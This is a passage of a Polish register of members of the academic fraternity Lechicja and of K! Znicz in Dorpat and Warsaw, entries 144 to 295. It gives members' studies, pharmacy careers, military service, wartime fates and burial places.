 144. Stanisław Karol Komornicki, (1868 - ) prowizor (UD?) 1892, członek ‘gość’ Lechicji w Dorpacie, właściciel apteki w Łomży Stary Rynek róg Farnej
 145. Ireneusz Komorowski, (1905-1977) student UW, akt. 1927-28, prawnik, adwokat
 146. Józef Onufry Kopeć, prowizor UD 1910, członek Lechicji w Dorpacie, oficer materiałowy 3-ego Baonu Sanitarnego, w Szefostwie Sanitarnym Okręgu Korpusu III, major
 147. Stanisław Kordowski, akt. 1924/25
 148. Edmund Kornacki, (1903-1977) c. 1924/25 (?), akt. 1924/25-25, prawnik, adwokat
 149. Mieczysław Kostro, (23 października 1888 w Łodzi - 14 grudnia 1967 w Sosnowcu) s. Juliana i Stefanii z Mogilnickich, absolwent Gimnazjum Męskiego w Łodzi, stryj Andrzeja i Tadeusza (obaj Welecja), odbył 1908-11 praktyki zawodowe w aptece ojca w Olicie oraz w aptece w Kijowie student i absolwent (prowizor) farmacji UD 1911-13, członek Lechicji w Dorpacie, lejtnant w szpitalach polowych Armii Rosyjskiej 1915-17, w 1917 założyciel Związku Wojskowych Polaków w Archangielsku, w 1917 przez Archangielsk wyjechał do Francji, ppor. WP 1918-22, pracował w aptekach w Wieluniu, Burzeninie, Radomsku, Wielgomłynach, Zawierciu 1922-27, dzierżawca apteki Piaskowskiego w Łazach 1927-35, od 1935 właściciel apteki w Czeladzi, prezes Ligi Morskiej i Kolonialnej w Czeladzi 1936-39, od 1951 pracował w aptekach w Czeladzi i Sosnowcu, pochowany na cmentarzu przy ul. Smutnej w Sosnowcu
 150. Tadeusz Kot, student UW, c. 1930/31, akt. 1930/31-32
 151. Ryszard Kotelba, (1906 - ) student UW, c. 1924/25 (?), akt. 1924/25-28, mgr farmacji UW 1928
 152. Gerwazy Kotlewski, (26 czerwca 1883 w Dochowie - ) student farmacji UD, członek Lechicji w Dorpacie, prezes ok. 1911, prowizor UD 1913, ppłk, w kierownictwie Zaopatrzenia Sanitarnego w Warszawie Powązki ul. Elbląska
 153. Tadeusz Kowalski, student UW, c. 1928/29, akt. 1928/29-32, sekretarz 1931/32, po wojnie na emigracji w Wielkiej Brytanii
 154. Zbigniew Kowalski, student prawa UW, c. 1928/29, akt. 1928/29-32
 155. Zygmunt Kowalski, student farmacji UD, członek Lechicji w Dorpacie
 156. Jan Kozankiewicz, (1900 - ) prowizor UD 1910, członek Lechicji w Dorpacie, właściciel apteki w Kłobucku
 157. Roman Kozaryn, s. Jana, student UD, członek K! Znicz w Dorpacie
 158. Kozerski,
 159. Stanisław Koziarski, (29 kwietnia 1887 w Sandomierzu - ) prowizor UD 1912, członek Lechicji w Dorpacie, właściciel apteki w Skierniewicach,

  Lech Kozierowski, 1969 r.

 160. Lech Bronisław Kozierowski, (27 września 1895 w Petersburgu - 24 października 1972 w Warszawie) s. Władysława (inż. górnictwa) i Jadwigi z Lewickich, absolwent Gimnazjum Filologicznego w Jaketynosławiu 1914, student matematyki Uniwersytetu w Charkowie 1914-16, od kwietnia do grudnia 1916 w armii carskiej, absolwent Szkoły Chorążych w Kijowie 1916, student Instytutu Góniczego w Jekaterynosławiu, student filozofii, a następnie prawa UW, akt. 1924-28, wiceprezes sem. zim. 1924/25, wiceprezes 1925/26, mgr praw UW, kpt. WP, żołnierz wojny obronnej 1939 (obrońca Warszawy), powstaniec warszawski, odznaczony Virtuti Militari (?) i Krzyżem Walecznych, pochowany na Starych Powązkach w Warszawie [Źródła (poza wskazanymi poniżej spisu członków): relacja Zbigniewa Krauze]

 161. Henryk Koźmian, student farmacji UD, członek Lechicji w Dorpacie

  Kazimierz Krauze, początek studiów.

 162. Kazimierz Krauze, (5 lipca 1899 w maj. Osieki w Rosji - 31 maja 1927 w Warszawie) s. Eugeniusza Mariana i Heleny z Balisińskich, brat Wiktora (Lechicja) oraz Antoniego i Eugeniusza (obaj Virtutia), w 1905 wraz z rodziną przyjechał z Rosji do Warszawy, uczeń Gimnazjum im. M. Reja w Warszawie, VII oraz IV Gimnazjum Warszawskiego (?), przemianowanego (w 1918 w Moskwie) na XIV Gimnazjum Moskiewskie, ochtonik WP 1918-20, gdzie dosłużył się stopnia wachmistrza w I Pułku Szwoleżerów, od 1919 student prawa UW, akt. 1924-26, prezes, pracownik ministerstwa, zmarł na gruźlicę w Szpitalu Dzieciątka Jezus, pochowany na Starych Powązkach w Warszawie [Źródła (poza wskazanymi poniżej spisu członków): relacja Zbigniewa Krauze]

  Wiktor Krauze, 1921 r.

 163. Wiktor Bolesław Krauze, (18 sierpnia 1898 w maj. Romadanowo k. Moskwy - 29 grudnia 1963 w Staszowie) s. Eugeniusza Mariana i Heleny z Balisińskich, brat Kazimierza (Lechicja) oraz Antoniego i Eugeniusza (obaj Virtutia), w 1905 wraz z rodziną przyjechał z Rosji do Warszawy, uczeń Gimnazjum im. M. Reja w Warszawie oraz II Progimnazjum Filologicznego, egzamin dojrzałości zdał po kursach maturalnych przy Polskim Powszechnym Towarzystwie Farmaceutycznym UW 1923, student i absolwent farmacji UW 1923-31, akt. 1924-31, ppor. rez. WP, właściciel apteki w Staszowie, a po jej upaństwowieniu jej kierownik, radny Rady Miejskiej w Staszowie, naczelnik a później prezes OSP w Staszowie, pochowany na Cmentarzu w Staszowie [Źródła (poza wskazanymi poniżej spisu członków): relacja Zbigniewa Krauze]

 164. Józefa Królikowska, student farmacji UD, członek Lechicji w Dorpacie
 165. Franciszek Kuczyński, student farmacji UD, członek Lechicji w Dorpacie
 166. Jan Kujawski, student UW, c. 1924/25 (?), akt. 1924/25-28
 167. Przemysław Kulesza, ( - 1973) student weterynarii UW, akt. 1924-29, prezes sem. let. (?) 1928/29
 168. Tadeusz Kupiec, ( - 1973 ?) student prawa UW, akt. 1928-32, sekretarz sem. zim. 1928/29,
 169. Władysław Kurek, (?)
 170. Włodzimierz Kurek, student PW, c. 1931/32, akt. 1931/32-32
 171. Wacław Kurkowski, (1886 - ) prowizor UD 1914, członek Lechicji w Dorpacie, pracownik apteki Krzanowskiego w Kielcach
 172. Edward Kurowski, (1901 - ) c. 1924/25 (?), akt. 1924/25-26, mgr farmacji UW 1931, współwłaściciel apteki Kurowskiego & ska
 173. Stanisław Labes, (1889 - ) student farmacji UD, członek Lechicji w Dorpacie, prezes ok. 1914, prowizor UD 1914, zarządca apteki Kasy Chorych w Zagożdżon, następnie pomocnik inspektora farmaceutycznego Wydziału Zdrowia Komisariatu Rządu, major

  Zdzisław Lecewicz, 1910 r.

 174. Zdzisław Lecewicz, (1889 - 1941?) mgr UW 1928, właściciel apteki w Poturzynie

 175. Ludwik Libiszowski, student UW, student PW (1932), akt. 1927-32
 176. Roman Lisicki, (1883 - ) prowizor UD 1909, członek Lechicji w Dorpacie, właściciel apteki w Pajęcznie
 177. Feliks Łaganowski, (10 października 1885 w Pińczowie - ) prowizor UD 1912, członek Lechicji w Dorpacie, od 1925 zarządca apteki Karola Kłosowskiego w Zamościu, od marcu 1948 jej właściciel i był nim aż do jej upaństwowienia w 1951
 178. Iwon Łapiński, student SGGW, c. 1932, akt. 1932
 179. Wacław Łopacki, student farmacji UD, członek Lechicji w Dorpacie
 180. Stanisław Łopatto, brat Witolda (Lechicja), student UW, c. 1929/30, akt. 1929-32, po wojnie na emigracji w Kanadzie
 181. Witold Łopatto, brat Stanisława (Lechicja), student WSH, c. 1932, akt. 1932, po wojnie na emigracji w Kanadzie, inż. w Ontario Hydro
 182. Ignacy Łotoczko, student farmacji UD, członek Lechicji w Dorpacie, ostatni (?) skarbnik w Dorpacie sem. wios. 1915, prowizor UD 1915, dzierżawca apteki Szydłowskiego w Kobryniu, następnie zarządzający apteki Bruśnickiej w Radomsku
 183. Wacław Łucki, prowizor UD 1910, członek Lechicji w Dorpacie, właściciel apteki w Praszce
 184. Mieczysław Maciejewski, (1884 - ) student PW, c. 1929/30, akt. 1929/30-32, mgr 1929 Warszawa, właściciel apteki w miejscowości Łyse
 185. Henryk Majewski, student chemii PW, c. 1927/28 (?), akt. 1927/28-32, II wiceprezes 1929/30, prezes 1931/32, olderman 1932/33
 186. Jerzy Majewski, (?) [prawd. Jerzy Majewski (2 kwietnia 1900 w Radomsku - 21 października 1980 w Londynie) brat Władysława (Lechicja), uczestnik wojny polsko-rosyjskiej 1920, student i absolwent prawa UW (mgr prawa), prokurator Białymstoku, a następnie Sądu Okręgowego w Kołomyi, przeszedł cały szlak bojowy z II Korpusem PSZ na Zachodzie (1 Dywizja Pancerna), po wojnie na emigracji w Londynie, pochowany na cmentarzu Mortlake (Źródła (poza wskazanymi poniżej spisu członków): archiwalia Biblioteki Polskiej w Londynie, relacja Tomasza Nowaka]
 187. Tadeusz Majewski, student prawa UW, c. 1925/26 (?), akt. 1925/26-28, sekretarz sem. let. 1927/28
 188. Władysław Majewski, ( - 1920) student farmacji UD, członek Lechicji w Dorpacie [być może brat Jerzego (Źródła (poza wskazanymi poniżej spisu członków): relacja Tomasza Nowaka]
 189. Wacław Malinowski, olderman sem. zim. 1928/29,
 190. Józef Małkiewicz, (28 października 1885 w Dwikozach pow. Sandomierz - ) student farmacji UD, członek Lechicji w Dorpacie
 191. Markiewicz,
 192. Stefan Mejster, (20 lutego 1887 w Ciechocinku - 1940 w Katyniu), s. Augusta i Marii z Radeckich, student farmacji UD, członek Lechicji w Dorpacie, uczestnik I wojny światowej, ppor. rez., od 1919 przydzielony do 8 Szpitala Okręgowego, w niewoli sowieckiej, zamordowany przez NKWD
 193. Zygmunt Mencel, student PW, c. 1932, akt. 1932
 194. Zbigniew Michalski, c. 1925/26 (?), akt. 1925/26
 195. Stefan Michelis, (ok. 1880 - 8 czerwca 1963) prowizor UD 1908, były właściciel apteki przy ul. Mokotowskiej 43 w Warszawie, pochowany na cmentarzu powązkowskim w Warszawie
 196. Wacław Mickiewicz, (6 luty 1887 w Wilnie - ) prowizor UD 1909, członek Lechicji w Dorpacie, właściciel apteki w Szczuczynie
 197. Jan Nepomucen Migurski, (1882-1945) prowizor UD 1909, członek Lechicji w Dorpacie, właściciel apteki w Bychawie a następnie w Lublinie ul. Narutowicza 27
 198. Henryk Minczewski, student farmacji UD, członek Lechicji w Dorpacie
 199. Józef Misiewicz, student farmacji UD, członek Lechicji w Dorpacie
 200. Gustaw Miśkiewicz, student UW, c. 1924/25 (?), akt. 1924/25-26

  Wincenty Miścicki, ok. 1910 r. (?).

 201. Wincenty Miścicki, (5 stycznia 1889 w Warszawie - 1940 w Katyniu) s. Celestyna i Wiktorii z d. Samulik, student farmacji UD, członek Lechicji w Dorpacie, prowizor 1912, w I wojnie światowej w wojskich rosyjskich, por. WP 1920, służył w Weterynaryjnym Składzie Aptecznym w Grodnie oraz w Okręgowym Szpitalu Koni nr 2 1920-22, a następnie w Centralnej Składnicy Sanitarnej w Warszaie 1922-24, przeniesiony do rezerwy 1924, należał do Kadry Zapasowej 1 Szpitala Okręgowego w Warszawie, zarządzający, a następnie współwłaściciel (?) apteki suc. Lewandowskiego i suc. Heitza Ludwika w Warszawie ul. Żelazna 65, założył wytwórnię wód gazowanych i aptecznych przy ul. Grzybowskiej 71, por. rez., przydzielony do 1 Szpitala Okręgowego, w niewoli sowieckiej, zamordowany przez NKWD

 202. Witold Monasterski, student PW, c. 1930/31, akt. 1930/31-32
 203. Tadeusz Morawski, student SGGW, Akademia Handlowa Antwerpia (1930), c. 1929/30, akt. 1929/30-32
 204. Tadeusz Mostowski, student farmacji UD, członek Lechicji w Dorpacie
 205. Mieczysław Mrożewski, student PW, c. 1928/29, akt. 1928/29-30
 206. Antoni Musiałowicz, student farmacji UD, członek Lechicji w Dorpacie

  Irena Muszyńska, ok. 1910 r.

 207. Irena Muszyńska, (1888 - 1977 w Warszawie) członek ‘gość’ Lechicji w Dorpacie

 208. Jan Nartowski, ( - 15 lutego 1973) student farmacji UD, członek Lechicji w Dorpacie, farmaceuta i chemik, wieloletni kierownik naukowej informacji Warszawskich Zakładów Farmaceutycznych „Polfa” 1963-73, pochowany na cmentarzu powązkowskim w Warszawie
 209. Bolesław Nawrocki, należał do Lechicji i Konwentu Batoria
 210. Tadeusz Niedzielski, ( - 22 sierpnia 1994 w Chicago) dr med., po wojnie na emigracji w Stanach Zjednoczonych, członek Koła Filistrów Polskich Korporacji Akademickich w Chicago
 211. Zygmunt Niemyski, (1881 - ) prowizor UD 1911, członek Lechicji w Dorpacie, właściciel apteki w Warszawie ul. Grochowska 16
 212. Leon Ninke, ( - przed 1973 ?) student PW, student prawa UW, akt. 1925-31, II wiceprezes sem. let. 1927/28, olderman 1928/29
 213. Roman Niziołowski, student farmacji UD, członek Lechicji w Dorpacie
 214. Wiesław Normark, student UW, c. 1929/30, akt. 1929/30-32
 215. Jadwiga Nowakowska, (1888 - ) prowizor UD 1914, członek Lechicji w Dorpacie, właściciel apteki w Fałkowie pow. Końskie
 216. Mieczysław Nowakowski, student UW, c. 1930/31, akt. 1930/31-32
 217. Zygmunt Nurzyński, (1887 - 1940) student farmacji UD, członek Lechicji w Dorpacie, magister UW 1923, właściciel apteki w Hajnówce, aresztowany na granicy
 218. Józef Olszakowski, (1884 - ) prowizor UD 1910, członek Lechicji w Dorpacie, właściciel apteki w Siedlcach ul. Sienkiewicza 58
 219. Bolesław Olszewski, (27 marca 1889 - 25 lipca 1952) prowizor UD 1914, członek i ostatni prezes Lechicji w Dorpacie, mgr UW 1924, dr farm.UW 1931, doc.1934, prof., dziekan Wydziału Farmaceutycznego w latach 1946-52, kierownik Zakładu Chemii Toksykologicznej i Sądowej, redaktor Acta Poloniae Pharmaceutica oraz Roczników Farmacji, wiceprezes Polskiego Towarzystwa Farmaceutycznego, współzałożyciel Towarzystwa Popierania Nauk Farmaceutycznych, brał udział w tajnym nauczaniu, pochowany na cmentarzu powązkowskim w Warszawie
 220. Jerzy Olszewski, student UW, akt. 1927-28
 221. Kazimierz Orłowski, (13 grudnia 1904 w Achałcychu na Kaukazie - 1940 w Katyniu), s. Bolesława i Ludwiki z Wasilewskich, absolwent Gimnazjum w Krasnymstawie, student i absolwent 1933 wet. UW, c. 1927/28 (?), akt. 1927/28-30, rejonowy lekarz wet. w Turobinie w pow. krasnostawskim, ppor. rez., przydzielony do 22 Pułku Artylerii Lekkiej, w niewoli niemieckiej, zamordowany przez NKWD
 222. Ignacy Ostrowski, student farmacji UD, członek Lechicji w Dorpacie

  Stefan Otolski, 1931 r.

 223. Stefan Otolski, (16 czerwca 1878 w Lipnie - 25 października 1950) syn Walentego i Izabelli z Wojewódzkich, ojciec Bohdana (Lechicja), prowizor UD 1903, mgr Wojskowa Akademia Medyczna w Petersburgu 1906, dr fil. UJK 1921, wybitny organizator polskiego przemysłu farmaceutycznego 1912-1944. W 1912 zorganizował laboratorium badawcze w Warszawskim Towarzystwie Handlu Towarami Aptecznymi „Zjednoczeni Aptekarze” i Ludwik Spiess i syn. W 1917 uruchomił w Tarchominie produkcję fosfatu. Redaktor pisma “Medicamenta Nova” 1912-1914, “Biologia Lekarska” 1935-1939, autor 167 prac z zakresu organizacji, materiałoznawstwa i technologii przemysłowej, wykładowca na UW, od 1934 dyrektor naukowy Przemysłowo Handlowych Zakładów Chemicznych Ludwik Spiess i Syn., Filister Lechicji oraz Filister honoris causa Batorii, prezes Koła Filistrów Lechicji 1927, Kawaler Dyplomu Zasługi i Złotej Odznaki ZPKA, pochowany na cmentarzu powązkowskim w Warszawie

 224. Zofia Palisa, prowizor UD 1913, członek Lechicji w Dorpacie, pracownik w aptece suc. Włodka w Żyrardowie, Al. Piłsudskiego
 225. Zdzisław Palle, student UW, c. 1925/26 (?), akt. 1925/26-28
 226. Eugeniusz Pankla, (21 stycznia 1883 w Białej Podlaskiej - 1940 w Charkowie) s. Eugeniusza i Marii z Ostrowskich, prowizor UD 1910, członek Lechicji w Dorpacie, właściciel apteki w Terespolu, por. służby zdrowia posp. rusz., przydzielony do kadry zapasowej 9 Szpitala Okręgowego, w niewoli sowieckiej, zamordowany przez NKWD

  Józef Papużyński, 1904 r.

 227. Józef Papużyński, (6 marca 1879 w Porycku na Wołyniu - 7 września 1944 w Chełmie) z rodziny szlacheckiej, ojciec Janusza (Korpus Zawisza Czarny, Poznań), pracownik apteki Szanajcy oraz S. Hercberga w Lublinie oraz apteki Boreckiego w Chełmie 1901, student UD 1902-04, nawywca wraz z Władysławem Grzymałą apteki w Chełmie 1905, po odkupieniu połowy apteki od Władysława Grzymały samodzielny właściciel 1911, po przymusowym wyjeździe w czasie I wojny światowej pracownik w Nowej aptece Kunickiego w Kijowie (był to przymusowy wyjazd), do śmierci Wiceprezes Okręgowego Towarzystwa Farmaceutycznego w Lublinie, właściciel i kierowniki apteki, aktywny działacz społeczny, wraz z małżonką Józefą inicjator teatralnego kółka amatorskiego w Chełmie 1911, w którym sztuki grano po polsku (kółko przekształciło się później w Teatr Ziemi Chełmskiej, który przetrwał 100 lat), obok Antoniego Kusza i Władysława Grzymały reżyser stworzonego teatru, współzałożyciel Polskiego Towarzystwa Krajoznawczego w Chełmie 1910, prezes Koła Cyklistów w Chełmie i organizator wycieczek rowerowych dla poznania regionu), prezes Zarządu Polskiego Klubu Społecznego w Resursie Obywatelskiej (instytucji oferującej różnorodne i atrakcyjne propozycje kulturalne), pochowany na cmentarzu przy ul. Lwowskiej w Chełmie

 228. Stanisław Marian Pasierbiński, (1877 - ) syn Stanisława, prowizor UD 1904, członek K! Znicz w Dorpacie, właściciel apteki w Zawierciu
 229. Roman Pasiorowski, student weterynarii UW, c. 1924/25 (?), akt. 1925-29, prezes 1929/30
 230. Kazimierz Antoni Pawłowski, (1883 - ) prowizor UD 1909, członek Lechicji w Dorpacie, właściciel apteki w Białej Podlaskiej, Plac Wolności 24
 231. Stanisław Pawłowski, student farmacji UD, członek Lechicji w Dorpacie
 232. Leopold Pellegrini, (1886 - ) prowizor UD 1912, członek Lechicji w Dorpacie, major pracownik Wydziału Farmaceutycznego Departamentu Zdrowia M. S. Wojsk. Ministerstwa Spraw Wojskowych Warszawa ul. 6 Sierpnia 1/3/5
 233. Jan Petrych, c. 1924/25 (?), olderman 1925/26
 234. Kazimierz Pełczyński, (1909-1978) student prawa UW, akt. c. 1927/28 (?), 1927/28-28, prawnik, adwokat
 235. Juljan Piasecki, c. 1924/25 (?), akt. 1924/25-25
 236. Czesław Piaskowski, ( - 1920) student farmacji UD, członek Lechicji w Dorpacie
 237. Piotr Pietkiewicz, (1890 - ) prowizor UD 1915, członek Lechicji w Dorpacie, ostatni (?) prezes w Dorpacie sem. wios. 1915, właściciel apteki w Łyntupach pow. Święciany ul. Berbeckiego 4
 238. Andrzej Piętka, (23 listopada 1912 w Nachiczewaniu na przedmieściach Rostowa n. Donem - 26 września 2004 w Warszawie) s. Jana Kazimierza (Lechicja) i Wandy z Trębaczkiewiczów, siostrzeniec Aleksandra Trębaczkiewicza (Lechicja), zięć Stanisława Gołębiowskiego (Lechicja), absolwent Gimnazjum Ludwika Lorentza w Warszawie, student Wydziału Weterynarii, a następnie student i absolwent 1939 med. UW, ochotnik w obronie Warszawy w wojnie obronnej 1939, w czasie okupacji lekarz w Szpitalu Ujazdowskim, w Szpitalu Praskim i w Szpitalu Dziecięcym przy ul. Kopernika w Warszawie oraz w lecznicy w Chotomowie, w konspiracji VIII Obwodzie AK “Obroża”, lekarz Batalionu “Golski” w powstaniu warszawskim, po wojnie dyrektor Powiatowego Szpitala Zakaźnego w Ostrowi Mazowiecka 1945-47, od 1948 do emerytury konstultant pediatryczny i lekarz zakładowy w Stołecznym Centrum Rehabilitacji Narządów Ruchu w Konstancinie, olderman Stowarzyszenia Filistrów Polskich Korporacji Akademickich 2003-05, reaktywator Lechicji 2004, pochowany na warszawskich Powązkach

  [Źródła (poza wskazanymi poniżej spisu członków): relacja Jana Piętki (s. Andrzeja)]

  Jan Piętka, 1937 r.

 239. Jan Kazimierz Piętka, (1879 w rodzinnym maj. Podjanów k. Ostrowi Mazowiecka - marzec 1943 w Legionowie) s. Hipolita i Anny z Dąbrowskich, ojciec Andrzeja (Lechicja), szwagier Aleksandra Trębaczkiewicza (Lechicja), absolwent Gimnazjum w Pułtusku, student i absolwent (prowizor 1910) farmacji UD, członek K! Znicz (?), a następnie Lechicji, do rewolucji październikowej właściciel apteki w Rostowie nad Donem, w czasie wojny domowej w Rosji i wojny polsko-bolszewickiej 1920 udzielał pomocy polskim uchodźcom, po przyjeździe do Polski pracował w aptece Gesnera w Warszawie 1921(?)-36, współwłaściciel apteki w Legionowie 1936-43, pochowany na cmentarzu powązkowskim w Warszawie

  [Źródła (poza wskazanymi poniżej spisu członków): relacja Jana Piętki (s. Andrzeja)]

 240. Pikturno, student UD, członek K! Znicz w Dorpacie
 241. Karolina Piotrowska, członek ‘gość’ Lechicji w Dorpacie
 242. Jan Pliszczyński, (1888 - ) prowizor UD 1913, członek Lechicji w Dorpacie, właściciel apteki w Uchaniach pow. Hrubieszów
 243. Marjan Falken-Płachecki, student UW, akt. 1928-32, II wiceprezes sem. zim. 1928/29, I wiceprezes sem. let. (?) 1928/29, olderman 1930/31
 244. Paweł Podolecki, (1882 - ) prowizor UD 1910, członek Lechicji w Dorpacie, pracownik apteki Iwje pow.Lida
 245. Poraziński,
 246. Konstanty Potocki, (18 lutego 1886 w Kielcach - 4 września 1967) s. Juliana i Lucyny z Chorzelskich, stryj Romana (Lechicja), uczeń gimnazjum klasycznego w Kielcach, praktykował w aptekach w Międzyrzecu na Podlasiu, Piotrkowie Trybunalskim oraz Łodzi, uzyskał stopień pomocnika lekarskiego po zdaniu egzaminów na Uniwersytecie w Kazaniu 1906, student i absolwent (prowizor) UD 1909-11, członek Lechicji w Dorpacie, po studiach pracował w aptekach w Warszawie, Kielcach, Łodzi, Odessie, w czasie I wojny światoej pracownik Rosyjskiego Czerwonego Krzyża w Kijowie 1914-18, od 1920 zarządca apteki prowadzonej pod firmą Kazimierza Wendy w Warszawie przy ul. Krakowskie Przedmieście 45, hurtownik i przemysłowiec farmaceutyczny, w 1921 współzałożyciel, a od 1937 właściciel przedsiębiorstwa farmaceutycznego, w 1937 firma nosiła nazwę “Dr farm. K. Wenda, Zakłady Przemysłowo-Handlowe, sp. z. o.o.”, w czasie okupacji prowadził od 1943 aptekę w Alejach Jerozolimskich, w wspierał finansowo i organizacyjnie m.in. działalność konsiracyjną, wysiedlonych profesorów UP, więźniów obozów koncentracyjnych, więźniów getta warszawskiego, m.in. zorganizował i sfinansował uczekę z getta prof. Ludwika Hirszfelda i jego rodziny, po wojnie prowadził aptekę z siedzibą w budynku hotelu “Polonia” przy Al. Jerozolimskich 39, po upaństwowieniu aptek pracował w aptekach warszawskich 1951-63, działacz farmaceutyczny, członek Polskiego Powszechnego Towarzystwa Farmaceutycznego, Związku Polskiego Przemysłu Farmaceutycznego i Warszawskiego Towarzystwa Farmaceutycznego, a po wojnie Polskiego Towarzystwa Farmaceutycznego, aktywnie wspierał Fundusz Obrony Narodowej, był współfundatorem zakupu samolotu sanitarnego dla Wojska Polskiego, po wojnie angażował się w odbudowę ewangelickiego kościoła św. Trójcy przy ul. Małachowskiego w Warszawie, pochowany na Cmentarzu Ewangelicko-Augsburskim w Warszawie, odznaczony Złotym Krzyżem Zasługi 1937, a po wojnie Krzyżem Kawalerskim OOP (szerzej Teodor Kikta, Konstanty Potocki (1886-1967), Farmacja Polska 1994, nr 9 (50), s. 392-397)
 247. Roman Potocki, (1906 - 2001 w Australii) bratanek Konstantego (Lechicja), student UW, c. 1927/28 (?), akt. 1927/28-28, po obozach sowieckich służył w II Korpucie PSZ na Zachodzie, po wojnie na emigracji w Australii
 248. Wacław Sulima-Przygodzki, student prawa UW, c. 1924/25 (?), akt. 1924/25-29, prezes sem. zim. 1928/29,
 249. Jan Pryliński, student farmacji UD, członek Lechicji w Dorpacie
 250. Mieczysław Ptaszyński, (28 grudnia 1885 w Zamościu - 4 maja 1959 w Kaliszu) s. Konstantego i Matyldy z d. Barszczewskich, prowizor UD 1911, członek Lechicji w Dorpacie, w początkach lat 20-tych pracownik apteki w Brzeźnicy, właściciel apteki w Skalbmierzu 1924-27, współwłaściciel apteki w Miechowie 1927-29, właściciel apteki w Kaliszu przy ul. Kanonickiej 1929-1939 i 1939-51, w czasie okupacji pracownik apteki Konstantego Potockiego w Warszawie 1940-41 oraz dzierżawca apteki miejskiej w Garwolinie 1942-45, po upaństwowieniu aptek pracownik apteki w Kaliszu 1951-59, pochowany na cmentarzu bródnowskim w Warszawie (kwatera 14B, rząd 1, grób 13)
 251. Bolesław Radomski, (15 października 1882 - 17 stycznia 1958) prowizor UD 1909, mgr UW 1910, właściciel apteki w Warszawie przy ul. Marszałkowskiej 95, Pochowany na cmentarzu powązkowskim w Warszawie.
 252. Czesław Ręczajski, student leśnictwa SGGW, c. 1925/26 (?), akt. 1925/26-30
 253. Wiktor Ręczajski, student prawa UW, c. 1927/28 (?), akt. 1927/28-31
 254. Edward Rodziewicz, student farmacji UD, członek Lechicji w Dorpacie
 255. Jan Rożniakowski, (1887 - ) prowizor UD 1913, członek Lechicji w Dorpacie, właściciel apteki w Solcu pow. Stopnicki
 256. Wiktor Rozpędzichowski, (15 października 1881w Warszawie - ) prowizor UD 1912, członek Lechicji w Dorpacie (?), właściciel apteki w Warszawie ul. Elektoralna 35
 257. Różycki,
 258. Stanisław Rutkowski, student UW, c. 1930/31, akt. 1930/31-32
 259. Stanisław Rybak, student filologii UW, c. 1927/28 (?), akt. 1927/28-29

  Aleksander Marian Ryl.

 260. Aleksander Marian Ryl, (8 grudnia 1870 w Chęcinach - 4 sierpnia 1933 w Warszawie) s. Aleksandra Wincentego i Józefy z Janiszewskich, absolwent Gimnazjum Męskiego w Radomiu, po zakończeniu szkoły średniej odbywał praktykę w aptece Augusta Stopczyka przy ul. Piotrkowskiej w Łodzi, zdał egzamin na podaptekarza na UW 1893, a następnie pracował w aptece Piskorskiego w Odessie, student i absolwent 1897 farmacji UD, pierwszy prezes Lechicji (Znicza ?), po studiach właściel apetek kolejno w Parczewie i Warszawie, współwłaściciel spółki “Żłobikowski, Zembrzuski i S-ka” w Warszawie (później “Pracownia Kapsułek Żelatynowych Lekarskich S. Zembrzuski i Spółka’), członek zarządu i dyrektor Warszawskiego Towarzystwa Akcyjnego „Motor” w Warszawie, działacz Polskiego Powszechnego Towarzystwa Farmaceutycznego i Warszawskiego Towarzystwa Farmaceutycznego, prezes Towarzystwa Czytelni w Warszawie, pochowany w grobowcu rodzinnym na warszawskich Powązkach (zob. Justyna Krogulska, Mariusz Lesław Krogulski, Genealogia rodziny Rylów od XVIII do XXI w., Tuchów 2011)

 261. Aleksander Rytwiński, student farmacji UD, członek Lechicji w Dorpacie
 262. Mieczysław Rzepiński, student prawa UW, c. 1927/28 (?), akt. 1927/28-31
 263. Feliks Andrzej Samucewicz, s. Kazimierza, student farmacji UD, członek K! Znicz w Dorpacie właściciel apteki we Włodzimierzu Wołyńskim
 264. Czesław Sawicki, student UD, członek K! Znicz w Dorpacie
 265. Edmund Sawicki, student prawa UW, c. 1927/28 (?), akt. 1927/28-28
 266. Tadeusz Schuch,
 267. Henryk Schultz, student farmacji UD, członek Lechicji w Dorpacie
 268. Józef Siemienowicz, student farmacji UD, członek Lechicji w Dorpacie
 269. Bolesław Sienkiewicz, (1881 - ) prowizor UD 1910, członek Lechicji w Dorpacie, właściciel apteki w Rafałówce pow. Sarny
 270. Mieczysław Sikorski, (ok. 1891 - 24 maja 1921) ojciec Jana (Lauda, Kraków), student farmacji UD, członek Lechicji w Dorpacie, założyciel i właściciel apteki przy ul. Piotrkowskiej w Kielcach, kapitan rez. WP
 271. Wladyslaw Jan Sikorski, (21 marca 1888 w Warszawie - 16 grudnia 1979) student UD i UJK, mgr farmacji UJK 1923, właściciel apteki w Ujeździe pow. Brzeziny, pochowany na warszawskich Powązkach
 272. Jan Skalski, c. 1924/25 (?), akt. 1924/25-25
 273. Piotr Skalski, c. 1925/26 (?), akt. 1925/26
 274. Stefan Skowroński, student farmacji UD, członek Lechicji w Dorpacie

  Bogdan Słabiński (?), prawd. druga połowa lat 30-tych.

 275. Bogdan Słabiński, student UW, c. 1931/32, akt. 1931/32-32

 276. Słomski, student UD, członek K! Znicz w Dorpacie
 277. Marjan Sochański, student farmacji UD, członek Lechicji w Dorpacie
 278. Kazimierz Sokołowski, student weterynarii UW, c. 1927/28 (?), akt. 1927/28-31
 279. Józef Sojczyński, (1885 - ) prowizor UD 1912, członek Lechicji w Dorpacie, mgr farm., właściciel apteki w Sannikach pow. Gostynin
 280. Konrad Sosnowski, student UW, c. 1924/25 (?), akt. 1924/25-26
 281. Stachowicz,
 282. Starnawski,
 283. Antoni Stasiak, student medycyny UW, c. 1928/29, akt. 1928/29-32
 284. Wacław Mauryliusz Stelmaszczyk, (1 września 1883 - 1950) syn Aleksandra i Antoniny z Ruszkowskich, prowizor UD 1909, członek Lechicji w Dorpacie, szef sprzedaży firmy L. Spiess i Syn w Warszawie
 285. Zbigniew Stępniewski, student UW, c. 1930/31, akt. 1930/31-32
 286. E. Stocki, student UD, członek K! Znicz w Dorpacie
 287. Strzelecki,
 288. Henryk Stypułkowski, akt. 1923-25, sekretarz (?) sem. zim. 1924/25
 289. Suchoński,
 290. Antoni Sutkowski, student prawa UW, student USB Wilno (1931), c. 1928/29, akt. 1928/29-32
 291. Stanisław Sykulski, student farmacji UD, członek Lechicji w Dorpacie
 292. Tadeusz Szczawiński, student prawa UW, c. 1928/29, akt. 1928/29-30
 293. Albin Szczuka, (1883 - ) prowizor UD 1910, właściciel apteki w Siedlcach,
 294. Zygmunt Szlichciński, (1887 - ) prowizor UD 1912, pracownik apteki Gessnera w Warszawie
 295. Michał Szumski, student WSH, c. 1928/29, akt. 1928/29
